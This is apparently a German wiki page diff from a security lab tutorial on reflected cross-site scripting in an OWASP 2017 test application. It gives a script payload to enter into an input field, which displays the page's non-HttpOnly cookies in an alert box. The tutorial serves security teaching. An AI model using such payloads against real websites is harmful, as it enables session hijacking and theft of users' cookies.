X-Crossite-Scripting: Unterschied zwischen den Versionen
Zur Navigation springen
Zur Suche springen
| Zeile 9: | Zeile 9: | ||
=Es geht ein Fenster auf - Seite ist verwundbar= | =Es geht ein Fenster auf - Seite ist verwundbar= | ||
[[Datei:Owasp-xss-2.png]] | [[Datei:Owasp-xss-2.png]] | ||
| − | =Cookie | + | =Cookie auslesen= |
;Das muss ins Eingabefeld | ;Das muss ins Eingabefeld | ||
*<script>alert('Cookies which do not have the HTTPOnly attribute set: ' + document.cookie);</script> | *<script>alert('Cookies which do not have the HTTPOnly attribute set: ' + document.cookie);</script> | ||
[[Datei:Owasp-xss-3.png]] | [[Datei:Owasp-xss-3.png]] | ||
Aktuelle Version vom 29. Juli 2021, 18:46 Uhr
Schwachstelle
- OWASP2017
- A7-Cross-Site-Scripting(XSS)
- Reflected First Order
- DNS LOOKUP
- Reflected First Order
- A7-Cross-Site-Scripting(XSS)
Testen ob Anwendung verwundbar ist
Es geht ein Fenster auf - Seite ist verwundbar
Cookie auslesen
- Das muss ins Eingabefeld
- <script>alert('Cookies which do not have the HTTPOnly attribute set: ' + document.cookie);</script>
